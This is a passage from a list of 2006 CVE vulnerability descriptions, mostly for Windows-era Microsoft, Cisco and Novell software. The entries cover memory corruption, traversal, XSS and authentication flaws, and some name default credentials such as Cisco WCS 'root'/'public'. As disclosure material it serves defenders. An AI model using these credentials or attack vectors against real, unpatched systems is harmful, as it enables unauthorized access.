danim.dll in Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (application crash) by accessing the Data property of a DirectAnimation DAUserData object before it is initialized, which triggers a NULL pointer dereference. [CVE-2006-3512] Internet Explorer 6 on Windows XP allows remote attackers to cause a denial of service (crash) by setting the Enabled property of a DXTFilter ActiveX object to true, which triggers a null dereference. [CVE-2006-3511] Internet Explorer 6 on Windows XP SP2 allows remote attackers to cause a denial of service (crash) by setting the fonts property of the HtmlDlgSafeHelper object, which triggers a null dereference. [CVE-2006-3493] Buffer overflow in LsCreateLine function (mso_203) in mso.dll and mso9.dll, as used by Microsoft Word and possibly other products in Microsoft Office 2003, 2002, and 2000, allows remote user-assisted attackers to cause a denial of service (crash) via a crafted Word DOC or other Office file type. NOTE: this issue was originally reported to allow code execution, but on 20060710 Microsoft stated that code execution is not possible, and the original researcher agrees. [CVE-2006-3488] Absolute path traversal vulnerability in administrador.asp in VirtuaStore 2.0 allows remote attackers to possibly read arbitrary directories or files via an absolute path with Windows drive letter in the Pasta parameter when link=util, acao=ftp, and acaba=sim. [CVE-2006-3472] Microsoft Internet Explorer 6.0 and 6.0 SP1 allows remote attackers to cause a denial of service via an HTML page with an A tag containing a long title attribute. NOTE: the provenance of this information is unknown [CVE-2006-3451] Microsoft Internet Explorer 5 SP4 and 6 do not properly garbage collect when "multiple imports are used on a styleSheets collection" to construct a chain of Cascading Style Sheets (CSS), which allows remote attackers to execute arbitrary code via unspecified vectors. [CVE-2006-3450] Microsoft Internet Explorer 6 allows remote attackers to execute arbitrary code by using the document.getElementByID Javascript function to access crafted Cascading Style Sheet (CSS) elements, and possibly other unspecified vectors involving certain layout positioning combinations in an HTML file. [CVE-2006-3449] Unspecified vulnerability in Microsoft PowerPoint 2000 through 2003, possibly a buffer overflow, allows user-assisted remote attackers to execute arbitrary commands via a malformed record in the BIFF file format used in a PPT file, a different issue than CVE-2006-1540, aka "Microsoft PowerPoint Malformed Record Vulnerability." [CVE-2006-3438] Unspecified vulnerability in Microsoft Hyperlink Object Library (hlink.dll), possibly a buffer overflow, allows user-assisted attackers to execute arbitrary code via crafted hyperlinks that are not properly handled when hlink.dll "uses a file containing a malformed function," aka "Hyperlink Object Function Vulnerability." [CVE-2006-3436] Cross-site scripting (XSS) vulnerability in Microsoft .NET Framework 2.0 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving "ASP.NET controls that set the AutoPostBack property to true". [CVE-2006-3435] PowerPoint in Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac does not properly parse the slide notes field in a document, which allows remote user-assisted attackers to execute arbitrary code via crafted data in this field, which triggers an erroneous object pointer calculation that uses data from within the document. NOTE: this issue is different than other PowerPoint vulnerabilities including CVE-2006-4694. [CVE-2006-3434] Unspecified vulnerability in Microsoft Office 2000, XP, 2003, 2004 for Mac, and v.X for Mac allows remote user-assisted attackers to execute arbitrary code via a crafted string that triggers memory corruption. [CVE-2006-3431] Buffer overflow in certain Asian language versions of Microsoft Excel might allow user-assisted attackers to execute arbitrary code via a crafted STYLE record in a spreadsheet that triggers the overflow when the user attempts to repair the document or selects the "Style" option, as demonstrated by nanika.xls. NOTE: Microsoft has confirmed to CVE via e-mail that this is different than the other Excel vulnerabilities announced before 20060707, including CVE-2006-3059 and CVE-2006-3086. [CVE-2006-3427] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by declaring the sourceURL attribute on an uninitialized DirectAnimation.StructuredGraphicsControl ActiveX Object, which triggers a null dereference. [CVE-2006-3357] Heap-based buffer overflow in HTML Help ActiveX control (hhctrl.ocx) in Microsoft Internet Explorer 6.0 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code by repeatedly setting the Image field of an Internet.HHCtrl.1 object to certain values, possibly related to improper escaping and long strings. [CVE-2006-3354] Microsoft Internet Explorer 6 allows remote attackers to cause a denial of service (crash) by setting the Filter property of an ADODB.Recordset ActiveX object to certain values multiple times, which triggers a null dereference. [CVE-2006-3351] Buffer overflow in Windows Explorer (explorer.exe) on Windows XP and 2003 allows user-assisted attackers to cause a denial of service (repeated crash) and possibly execute arbitrary code via a .url file with an InternetShortcut tag containing a long URL and a large number of "file:" specifiers. [CVE-2006-3290] HTTP server in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) stores sensitive information under the web root with insufficient access control, which allows remote attackers to obtain usernames and directory paths via a direct URL request. [CVE-2006-3289] Cross-site scripting (XSS) vulnerability in the login page of the HTTP interface for the Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) allows remote attackers to inject arbitrary web script or HTML via unspecified vectors involving a "malicious URL". [CVE-2006-3288] Unspecified vulnerability in the TFTP server in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51), when configured to use a directory path name that contains a space character, allows remote authenticated users to read and overwrite arbitrary files via unspecified vectors. [CVE-2006-3287] Cisco Wireless Control System (WCS) for Linux and Windows 4.0(1) and earlier uses a default administrator username "root" and password "public," which allows remote attackers to gain access (aka bug CSCse21391). [CVE-2006-3286] The internal database in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(63) stores a hard-coded username and password in plaintext within unspecified files, which allows remote authenticated users to access the database (aka bug CSCsd15951). [CVE-2006-3285] The internal database in Cisco Wireless Control System (WCS) for Linux and Windows before 3.2(51) uses an undocumented, hard-coded username and password, which allows remote authenticated users to read, and possibly modify, sensitive configuration data (aka bugs CSCsd15955). [CVE-2006-3281] Microsoft Internet Explorer 6.0 does not properly handle Drag and Drop events, which allows remote user-assisted attackers to execute arbitrary code via a link to an SMB file share with a filename that contains encoded ..\ (%2e%2e%5c) sequences and whose extension contains the CLSID Key identifier for HTML Applications (HTA), aka "Folder GUID Code Execution Vulnerability." NOTE: directory traversal sequences were used in the original exploit, although their role is not clear. [CVE-2006-3280] Cross-domain vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to access restricted information from other domains via an object tag with a data parameter that references a link on the attacker's originating site that specifies a Location HTTP header that references the target site, which then makes that content available through the outerHTML attribute of the object, aka "Redirect Cross-Domain Information Disclosure Vulnerability." [CVE-2006-3274] Directory traversal vulnerability in Webmin before 1.280, when run on Windows, allows remote attackers to read arbitrary files via \ (backslash) characters in the URL to certain directories under the web root, such as the image directory. [CVE-2006-3268] Unspecified vulnerability in the Windows Client API in Novell GroupWise 5.x through 7 might allow users to obtain "random programmatic access" to other email within the same post office. [CVE-2006-3250] Heap-based buffer overflow in Windows Live Messenger 8.0 allows user-assisted attackers to execute arbitrary code via a crafted Contact List (.ctt) file, which triggers the overflow when it is imported by the user. [CVE-2006-3226] Cisco Secure Access Control Server (ACS) 4.x for Windows uses the client's IP address and the server's port number to grant access to an HTTP server port for an administration session, which allows remote attackers to bypass authentication via various methods, aka "ACS Weak Session Management Vulnerability." [CVE-2006-3146] The TOSRFBD.SYS driver for Toshiba Bluetooth Stack 4.00.29 and earlier on Windows allows remote attackers to cause a denial of service (reboot) via a L2CAP echo request that triggers an out-of-bounds memory access, similar to "Ping o' Death" and as demonstrated by BlueSmack. NOTE: this issue was originally reported for 4.00.23. [CVE-2006-3086] Stack-based buffer overflow in the HrShellOpenWithMonikerDisplayName function in Microsoft Hyperlink Object Library (hlink.dll) allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long hyperlink, as demonstrated using an Excel worksheet with a long link in Unicode, aka "Hyperlink COM Object Buffer Overflow Vulnerability." NOTE: this is a different issue than CVE-2006-3059. [CVE-2006-3074] klif.sys in Kaspersky Internet Security 6.0 and 7.0, Kaspersky Anti-Virus (KAV) 6.0 and 7.0, KAV 6.0 for Windows Workstations, and KAV 6.0 for Windows Servers does not validate certain parameters to the (1) NtCreateKey, (2) NtCreateProcess, (3) NtCreateProcessEx, (4) NtCreateSection, (5) NtCreateSymbolicLinkObject, (6) NtCreateThread, (7) NtDeleteValueKey, (8) NtLoadKey2, (9) NtOpenKey, (10) NtOpenProcess, (11) NtOpenSection, and (12) NtQueryValueKey hooked system calls, which allows local users to cause a denial of service (reboot) via an invalid parameter, as demonstrated by the ClientId parameter to NtOpenProcess. [CVE-2006-3059] Unspecified vulnerability in Microsoft Excel 2000 through 2004 allows remote user-assisted attackers to execute arbitrary code via unspecified vectors. NOTE: this is a different vulnerability than CVE-2006-3086. [CVE-2006-3014] Microsoft Excel allows user-assisted attackers to execute arbitrary javascript and redirect users to arbitrary sites via an Excel spreadsheet with an embedded Shockwave Flash Player ActiveX Object, which is automatically executed when the user opens the spreadsheet. [CVE-2006-2919] Unspecified vulnerability in Microsoft NetMeeting 3.01 allows remote attackers to cause a denial of service (crash or CPU consumption) and possibly execute arbitrary code via crafted inputs that trigger memory corruption. [CVE-2006-2856] ActiveState ActivePerl 5.8.8.817 for Windows configures the site/lib directory with "Users" group permissions for changing files, which allows local users to gain privileges by creating a malicious sitecustomize.pl file in that directory. NOTE: The provenance of this information is unknown [CVE-2006-2838] Buffer overflow in the web console in F-Secure Anti-Virus for Microsoft Exchange 6.40, and Internet Gatekeeper 6.40 through 6.42 and 6.50 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via unknown attack vectors. NOTE: By default, the connections are only allowed from the local host. [CVE-2006-2719] JIWA Financials 6.4.14 stores usernames and passwords for all accounts in cleartext in the HR_Staff table in Microsoft SQL Server, and sends the usernames and passwords in cleartext to the application's SQL Server ODBC driver, which might allow context-dependent attackers to obtain the passwords. [CVE-2006-2718] JIWA Financials 6.4.14 passes a Microsoft SQL Server account's username and password, and the name of a data source, to a Crystal Reports .rpt file, which allows remote authenticated users to execute certain standard stored procedures by referencing them in a user-written .rpt file, as demonstrated by using a stored procedure that provides the username and cleartext password of every account. [CVE-2006-2679] Unspecified vulnerability in the VPN Client for Windows Graphical User Interface (GUI) (aka the VPN client dialer) in Cisco VPN Client for Windows 4.8.00.* and earlier, except for 4.7.00.0533, allows local authenticated, interactive users to gain privileges, possibly due to privileges of dialog boxes, aka bug ID CSCsd79265. [CVE-2006-2612] Novell Client for Windows 4.8 and 4.9 does not restrict access to the clipboard contents while a machine is locked, which allows users with physical access to read the current clipboard contents by pasting them into the "User Name" field on the login prompt. [CVE-2006-2492] Buffer overflow in Microsoft Word in Office 2000 SP3, Office XP SP3, Office 2003 Sp1 and SP2, and Microsoft Works Suites through 2006, allows user-assisted attackers to execute arbitrary code via a malformed object pointer, as originally reported by ISC on 20060519 for a zero-day attack. [CVE-2006-2389] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via an Office file with a malformed property that triggers memory corruption related to record lengths, aka "Microsoft Office Property Vulnerability," a different vulnerability than CVE-2006-1316. [CVE-2006-2388] Microsoft Office Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via malformed cell comments, which lead to modification of "critical data offsets" during the rebuilding process. [CVE-2006-2387] Unspecified vulnerability in Microsoft Excel 2000, 2002, 2003, 2004 for Mac, v.X for Mac, Excel Viewer 2003, and Microsoft Works Suite 2004 through 2006 allows user-assisted attackers to execute arbitrary code via a crafted DATETIME record in an XLS file, a different vulnerability than CVE-2006-3867 and CVE-2006-3875. [CVE-2006-2385] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows user-assisted remote attackers to execute arbitrary code via a crafted web page that triggers memory corruption when it is saved as a multipart HTML (.mht) file. [CVE-2006-2384] Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to conduct spoofing and phishing attacks by using a modal browser window in a way that preserves the original address bar and trusted UI of a trusted site, even after the browser has been navigated to a malicious site, aka the "Address Bar Spoofing Vulnerability." [CVE-2006-2383] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to execute arbitrary code via "unexpected data" related to "parameter validation" in the DXImageTransform.Microsoft.Light ActiveX control, which causes Internet Explorer to crash in a way that enables the code execution. [CVE-2006-2382] Heap-based buffer overflow in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allows remote attackers to execute arbitrary code via crafted UTF-8 encoded HTML that results in size discrepancies during conversion to Unicode, aka "HTML Decoding Memory Corruption Vulnerability." [CVE-2006-2312] Argument injection vulnerability in the URI handler in Skype 2.0..104 and 2.5..0 through 2.5..78 for Windows allows remote authorized attackers to download arbitrary files via a URL that contains certain command-line switches. [CVE-2006-2311] Cross-site scripting (XSS) vulnerability in BlueDragon Server and Server JX 6.2.1.286 for Windows allows remote attackers to inject arbitrary web script or HTML via the filename in a request to a (1) .cfm or (2) .cfml file, which reflects the result in the default error page. [CVE-2006-2310] BlueDragon Server and Server JX 6.2.1.286 for Windows allows remote attackers to cause a denial of service (hang) via a request for a .cfm file whose name contains an MS-DOS device name such as (1) con, (2) aux, (3) com1, and (4) com2. [CVE-2006-2297] Heap-based buffer overflow in Microsoft Infotech Storage System Library (itss.dll) allows user-assisted attackers to execute arbitrary code via a crafted CHM / ITS file that triggers the overflow while decompiling. [CVE-2006-2273] The InstallProduct routine in the Verisign VUpdater.Install (aka i-Nav) ActiveX control does not verify Microsoft Cabinet (.CAB) files, which allows remote attackers to run an arbitrary executable file. [CVE-2006-2197] Integer overflow in wv2 before 0.2.3 might allow context-dependent attackers to execute arbitrary code via a crafted Microsoft Word document. [CVE-2006-2155] EMC Retrospect for Windows 6.5 before 6.5.382, 7.0 before 7.0.344, and 7.5 before 7.5.1.105 allows local users to execute arbitrary code by replacing the Retrospect.exe file, possibly due to improper file permissions. [CVE-2006-2154] EMC Retrospect for Windows 6.5 before 6.5.382, 7.0 before 7.0.344, and 7.5 before 7.5.1.105 does not drop privileges before opening files, which allows local users to execute arbitrary code via the File>Open dialog. [CVE-2006-2111] A component in Microsoft Outlook Express 6 allows remote attackers to bypass domain restrictions and obtain sensitive information via redirections with the mhtml: URI handler, as originally reported for Internet Explorer 6 and 7, aka "URL Redirect Cross Domain Information Disclosure Vulnerability." [CVE-2006-2092] Unspecified vulnerability in HP StorageWorks Secure Path for Windows 4.0C-SP2 before 20060419 allows remote attackers to cause an unspecified denial of service via unknown vectors. [CVE-2006-2058] Argument injection vulnerability in Avant Browser 10.1 Build 17 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-2057] Argument injection vulnerability in Mozilla Firefox 1.0.6 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-2055] Argument injection vulnerability in Microsoft Outlook 2003 SP1 allows user-assisted remote attackers to modify command line arguments to an invoked mail client via " (double quote) characters in a mailto: scheme handler, as demonstrated by launching Microsoft Outlook with an arbitrary filename as an attachment. NOTE: it is not clear whether this issue is implementation-specific or a problem in the Microsoft API. [CVE-2006-1992] mshtml.dll 6.00.2900.2873, as used in Microsoft Internet Explorer, allows remote attackers to cause a denial of service (crash) via nested OBJECT tags, which trigger invalid pointer dereferences including NULL dereferences. NOTE: the possibility of code execution was originally theorized, but Microsoft has stated that this issue is non-exploitable. [CVE-2006-1953] Directory traversal vulnerability in Caucho Resin 3.0.17 and 3.0.18 for Windows allows remote attackers to read arbitrary files via a "C:%5C" (encoded drive letter) in a URL. [CVE-2006-1952] Directory traversal vulnerability in WinAgents TFTP Server for Windows 3.1 and earlier allows remote attackers to read arbitrary files via "..." (triple dot) sequences in a GET request. [CVE-2006-1942] Mozilla Firefox 1.5.0.2 and possibly other versions before 1.5.0.4, Netscape 8.1, 8.0.4, and 7.2, and K-Meleon 0.9.13 allows user-assisted remote attackers to open local files via a web page with an IMG element containing a SRC attribute with a non-image file:// URL, then tricking the user into selecting View Image for the broken image, as demonstrated using a .wma file to launch Windows Media Player, or by referencing an "alternate web page." [CVE-2006-1934] Multiple buffer overflows in Ethereal 0.10.x up to 0.10.14 allow remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via the (1) ALCAP dissector, (2) Network Instruments file code, or (3) NetXray/Windows Sniffer file code. [CVE-2006-1774] HP System Management Homepage (SMH) 2.1.3.132, when running on CompaqHTTPServer/9.9 on Windows, Linux, or Tru64 UNIX, and when "Trust by Certificates" is not enabled, allows remote attackers to bypass authentication via a crafted URL. [CVE-2006-1725] Mozilla Firefox 1.5 before 1.5.0.2 and SeaMonkey before 1.0.1 causes certain windows to become translucent due to an interaction between XUL content windows and the history mechanism, which might allow user-assisted remote attackers to trick users into executing arbitrary code. [CVE-2006-1626] Internet Explorer 6 for Windows XP SP2 and earlier allows remote attackers to spoof the address bar and possibly conduct phishing attacks by re-opening the window to a malicious Shockwave Flash application, then changing the window location back to a trusted URL while the Flash application is still loading. NOTE: this is a different vulnerability than CVE-2006-1192. [CVE-2006-1540] MSO.DLL in Microsoft Office 2000, Office XP (2002), and Office 2003 allows user-assisted attackers to cause a denial of service and execute arbitrary code via multiple attack vectors, as originally demonstrated using a crafted document record with a malformed string, as demonstrated by replacing a certain "01 00 00 00" byte sequence with an "FF FF FF FF" byte sequence, possibly causing an invalid array index, in (1) an Excel .xls document, which triggers an access violation in ole32.dll [CVE-2006-1511] Buffer overflow in the ILASM assembler in the Microsoft .NET 1.0 and 1.1 Framework might allow user-assisted attackers to execute arbitrary code via a .il file that calls a function with a long name. [CVE-2006-1483] Blazix Web Server before 1.2.6, when running on Windows, allows remote attackers to obtain the source code of JSP files via (1) . (dot), (2) space, and (3) slash characters in the extension of a URL. [CVE-2006-1467] Integer overflow in the AAC file parsing code in Apple iTunes before 6.0.5 on Mac OS X 10.2.8 or later, and Windows XP and 2000, allows remote user-assisted attackers to execute arbitrary code via an AAC (M4P, M4A, or M4B) file with a sample table size (STSZ) atom with a "malformed" sample_size_table value. [CVE-2006-1394] Multiple cross-site scripting (XSS) vulnerabilities in the Microsoft IIS ISAPI filter (aka application server module) in University of Washington Pubcookie 3.1.0, 3.1.1, 3.2 before 3.2.1b, and 3.3 before 3.3.0a allow remote attackers to inject arbitrary web script or HTML via unspecified attack vectors. [CVE-2006-1388] Unspecified vulnerability in Microsoft Internet Explorer 6.0 allows remote attackers to execute HTA files via unknown vectors. [CVE-2006-1378] PasswordSafe 3.0 beta, when running on Windows before XP, uses a weak random number generator (C++ rand function) during generation of the database encryption key, which makes it easier for attackers to decrypt the database and steal passwords by generating keys for all possible rand() seed values and conducting a known plaintext attack. [CVE-2006-1364] Microsoft w3wp (aka w3wp.exe) does not properly handle when the AspCompat directive is not used when referencing COM components in ASP.NET, which allows remote attackers to cause a denial of service (resource consumption or crash) by repeatedly requesting each of several documents that refer to COM components, or are restricted documents located under the ASP.NET application path. [CVE-2006-1359] Microsoft Internet Explorer 6 and 7 Beta 2 allows remote attackers to cause a denial of service and possibly execute arbitrary code via a certain createTextRange call on a checkbox object, which results in a dereference of an invalid table pointer. [CVE-2006-1316] Unspecified vulnerability in Microsoft Office 2003 SP1 and SP2, Office XP SP3, Office 2000 SP3, and other products, allows user-assisted attackers to execute arbitrary code via an Office file with malformed string that triggers memory corruption related to record lengths, aka "Microsoft Office Parsing Vulnerability," a different vulnerability than CVE-2006-2389. [CVE-2006-1309] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted LABEL record that triggers memory corruption. [CVE-2006-1308] Unspecified vulnerability in Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted FNGROUPCOUNT value. [CVE-2006-1306] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted BIFF record with an attacker-controlled array index that is used for a function pointer, aka "Malformed OBJECT record Vulnerability." [CVE-2006-1305] Microsoft Outlook 2000, 2002, and 2003 allows user-assisted remote attackers to cause a denial of service (memory exhaustion and interrupted mail recovery) via malformed e-mail header information, possibly related to (1) long subject lines or (2) large numbers of recipients in To or CC headers. [CVE-2006-1304] Buffer overflow in Microsoft Excel 2000 through 2003 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted COLINFO record, which triggers the overflow during a "data filling operation." [CVE-2006-1303] Multiple unspecified vulnerabilities in Microsoft Internet Explorer 5.01 SP4 and 6 SP1 and earlier allow remote attackers to execute arbitrary code by instantiating certain COM objects from Wmm2fxa.dll as ActiveX controls including (1) DXImageTransform.Microsoft.MMSpecialEffect1Input, (2) DXImageTransform.Microsoft.MMSpecialEffect1Input.1, (3) DXImageTransform.Microsoft.MMSpecialEffect2Inputs, (4) DXImageTransform.Microsoft.MMSpecialEffect2Inputs.1, (5) DXImageTransform.Microsoft.MMSpecialEffectInplace1Input, and (6) DXImageTransform.Microsoft.MMSpecialEffectInplace1Input.1, which causes memory corruption during garbage collection. [CVE-2006-1302] Buffer overflow in Microsoft Excel 2000 through 2003 allows user-assisted attackers to execute arbitrary code via a .xls file with certain crafted fields in a SELECTION record, which triggers memory corruption, aka "Malformed SELECTION record Vulnerability." [CVE-2006-1301] Microsoft Excel 2000 through 2004 allows user-assisted attackers to execute arbitrary code via a .xls file with a crafted SELECTION record that triggers memory corruption, a different vulnerability than CVE-2006-1302. [CVE-2006-1298] Format string vulnerability in the Job Engine service (bengine.exe) in the Media Server in Veritas Backup Exec 10d (10.1) for Windows Servers rev. 5629, Backup Exec 10.0 for Windows Servers rev. 5520, Backup Exec 10.0 for Windows Servers rev. 5484, and Backup Exec 9.1 for Windows Servers rev. 4691, when the job log mode is Full Detailed (aka Full Details), allows remote authenticated users to cause a denial of service and possibly execute arbitrary code via a crafted filename on a machine that is backed up by Backup Exec. [CVE-2006-1297] Unspecified vulnerability in Veritas Backup Exec for Windows Server Remote Agent 9.1 through 10.1, for Netware Servers and Remote Agent 9.1 and 9.2, and Remote Agent for Linux Servers 10.0 and 10.1 allow attackers to cause a denial of service (application crash or unavailability) due to "memory errors." [CVE-2006-1257] The sample files in the authfiles directory in Microsoft Commerce Server 2002 before SP2 allow remote attackers to bypass authentication by logging in to authfiles/login.asp with a valid username and any password, then going to the main site twice. [CVE-2006-1245] Buffer overflow in mshtml.dll in Microsoft Internet Explorer 6.0.2900.2180, and probably other versions, allows remote attackers to execute arbitrary code via an HTML tag with a large number of script action handlers such as onload and onmouseover, as demonstrated using onclick, aka the "Multiple Event Handler Memory Corruption Vulnerability." [CVE-2006-1193] Cross-site scripting (XSS) vulnerability in Microsoft Exchange Server 2000 SP1 through SP3, when running Outlook Web Access (OWA), allows user-assisted remote attackers to inject arbitrary HTML or web script via unknown vectors related to "HTML parsing." [CVE-2006-1192] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to conduct phishing attacks by spoofing the address bar and other parts of the trust UI via unknown methods that allow "window content to persist" after the user has navigated to another site, aka the "Address Bar Spoofing Vulnerability." NOTE: this is a different vulnerability than CVE-2006-1626. [CVE-2006-1191] Microsoft Internet Explorer 5.01 through 6 does not always correctly identify the domain that is associated with a browser window, which allows remote attackers to obtain sensitive cross-domain information and spoof sites by running script after the user has navigated to another site. [CVE-2006-1190] Microsoft Internet Explorer 5.01 through 6 does not always return the correct IOleClientSite information when dynamically creating an embedded object, which could cause Internet Explorer to run the object in the wrong security context or zone, and allow remote attackers to execute arbitrary code. [CVE-2006-1189] Buffer overflow in URLMON.DLL in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via a crafted URL with an International Domain Name (IDN) using double-byte character sets (DBCS), aka the "Double Byte Character Parsing Memory Corruption Vulnerability." [CVE-2006-1188] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. [CVE-2006-1186] Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via by instantiating the (1) Mdt2gddr.dll, (2) Mdt2dd.dll, and (3) Mdt2gddo.dll COM objects as ActiveX controls, which leads to memory corruption. [CVE-2006-1185] Unspecified vulnerability in Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via certain invalid HTML that causes memory corruption. [CVE-2006-1166] Monotone 0.25 and earlier, when a user creates a file in a directory called "mt", and when checking out that file on a case-insensitive file system such as Windows or Mac OS X, places the file into the "MT" bookkeeping directory, which could allow context-dependent attackers to execute arbitrary Lua programs as the user running monotone. [CVE-2006-1161] Absolute path traversal vulnerability in Easy File Sharing (EFS) Web Server 3.2 allows remote registered users to execute arbitrary code by uploading a malicious file to the Windows startup folder. [CVE-2006-1043] Stack-based buffer overflow in Microsoft Visual Studio 6.0 and Microsoft Visual InterDev 6.0 allows user-assisted attackers to execute arbitrary code via a long DataProject field in a (1) Visual Studio Database Project File (.dbp) or (2) Visual Studio Solution (.sln). [CVE-2006-1023] Directory traversal vulnerability in HP System Management Homepage (SMH) 2.0.0 through 2.1.4 on Windows allows remote attackers to access certain files via unspecified vectors. [CVE-2006-1016] Buffer overflow in the IsComponentInstalled method in Internet Explorer 6.0, when used on Windows 2000 before SP4 or Windows XP before SP1, allows remote attackers to execute arbitrary code via JavaScript that calls IsComponentInstalled with a long first argument. [CVE-2006-1009] M4 Project enigma-suite before 0.73.3 (Windows) has a default password of "nominal" for the "enigma-client" account, which allows local users to gain access. [CVE-2006-0994] Multiple Sophos Anti-Virus products, including Anti-Virus for Windows 5.x before 5.2.1 and 4.x before 4.05, when cabinet file inspection is enabled, allows remote attackers to execute arbitrary code via a CAB file with "invalid folder count values," which leads to heap corruption. [CVE-2006-0991] Buffer overflow in the NetBackup Sharepoint Services server daemon (bpspsserver) on NetBackup 6.0 for Windows allows remote attackers to execute arbitrary code via crafted "Request Service" packets to the vnetd service (TCP port 13724). [CVE-2006-0935] Microsoft Word 2003 allows remote attackers to cause a denial of service (application crash) via a crafted file, as demonstrated by 101_filefuzz. [CVE-2006-0858] Unquoted Windows search path vulnerability in (1) snsmcon.exe, (2) the autostartup mechanism, and (3) an unspecified installation component in StarForce Safe'n'Sec Personal + Anti-Spyware 2.0 and earlier, and possibly other StarForce Safe'n'Sec products, might allow local users to gain privileges via a malicious "program" file in the C: folder. [CVE-2006-0818] Absolute path directory traversal vulnerability in (1) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (2) VisNetic MailServer before 8.5.0.5 allows remote authenticated users to include arbitrary files via a modified language parameter and a full Windows or UNC pathname in the lang_settings parameter to mail/index.html, which is not properly sanitized by the validatefolder PHP function, possibly due to an incomplete fix for CVE-2005-4558. [CVE-2006-0817] Absolute path directory traversal vulnerability in (a) MERAK Mail Server for Windows 8.3.8r with before IceWarp Web Mail 5.6.1 and (b) VisNetic MailServer before 8.5.0.5 allows remote attackers to include arbitrary files via a full Windows path and drive letter in the (1) language parameter in accounts/inc/include.php and (2) lang_settings parameter in admin/inc/include.php, which is not properly sanitized by the securepath function, a related issue to CVE-2005-4556. [CVE-2006-0816] Orion Application Server before 2.0.7, when running on Windows, allows remote attackers to obtain the source code of JSP files via (1) . (dot) and (2) space characters in the extension of a URL. [CVE-2006-0814] response.c in Lighttpd 1.4.10 and possibly previous versions, when run on Windows, allows remote attackers to read arbitrary source code via requests that contain trailing (1) "." (dot) and (2) space characters, which are ignored by Windows, as demonstrated by PHP files. [CVE-2006-0799] Microsoft Internet Explorer allows remote attackers to spoof a legitimate URL in the status bar and conduct a phishing attack via a web page with an anchor element with a legitimate "href" attribute, a form whose action points to a malicious URL, and an INPUT submit element that is modified to look like a legitimate URL. NOTE: this issue is very similar to CVE-2004-1104, although the manipulations are slightly different. [CVE-2006-0773] Cross-site scripting (XSS) vulnerability in Hitachi Business Logic - Container 02-03 through 03-00-/B on Windows, and 03-00 through 03-00-/B on Linux, allows remote attackers to inject arbitrary web script or HTML via unspecified vectors in the extended receiving box function. [CVE-2006-0772] SQL injection vulnerability in Hitachi Business Logic - Container 02-03 through 03-00-/B on Windows, and 03-00 through 03-00-/B on Linux, allows remote attackers to execute arbitrary SQL commands via unspecified vectors in the extended receiving box function. [CVE-2006-0766] ICQ Inc. (formerly Mirabilis) ICQ 2003a, 2003b, Lite 4.0, Lite 4.1, and possibly other Windows versions allows user-assisted remote attackers to hide malicious file extensions and bypass Windows security warnings via a filename that ends in an assumed-safe extension such as JPG, and possibly containing other modified properties such as company name, icon, and description, which could trick a user into executing arbitrary programs. [CVE-2006-0765] GUI display truncation vulnerability in ICQ Inc. (formerly Mirabilis) ICQ 2003a, 2003b, Lite 4.0, Lite 4.1, and possibly other Windows versions allows user-assisted remote attackers to hide malicious file extensions, bypass Windows security warnings via a filename that is all uppercase and of a specific length, which truncates the malicious extension from the display and could trick a user into executing arbitrary programs. [CVE-2006-0761] Buffer overflow in BlackBerry Attachment Service in Research in Motion (RIM) BlackBerry Enterprise Server 2.2 and 4.0 before SP3 Hotfix 4 for IBM Lotus Domino, 3.6 before SP7 and 5.0 before SP3 Hotfix 3 for Microsoft Exchangem, and 4.0 for Novell GroupWise before SP3 Hotfix 1 might allow user-assisted remote attackers to execute arbitrary code on the server via a crafted Microsoft Word document that is opened on a wireless device. [CVE-2006-0705] Format string vulnerability in a logging function as used by various SFTP servers, including (1) AttachmateWRQ Reflection for Secure IT UNIX Server before 6.0.0.9, (2) Reflection for Secure IT Windows Server before 6.0 build 38, (3) F-Secure SSH Server for Windows before 5.3 build 35, (4) F-Secure SSH Server for UNIX 3.0 through 5.0.8, (5) SSH Tectia Server 4.3.6 and earlier and 4.4.0, and (6) SSH Shell Server 3.2.9 and earlier, allows remote authenticated users to execute arbitrary commands via unspecified vectors, involving crafted filenames and the stat command. [CVE-2006-0656] Directory traversal vulnerability in HP Systems Insight Manager 4.2 through 5.0 SP3 for Windows allows remote attackers to access arbitrary files via unspecified vectors, a different vulnerability than 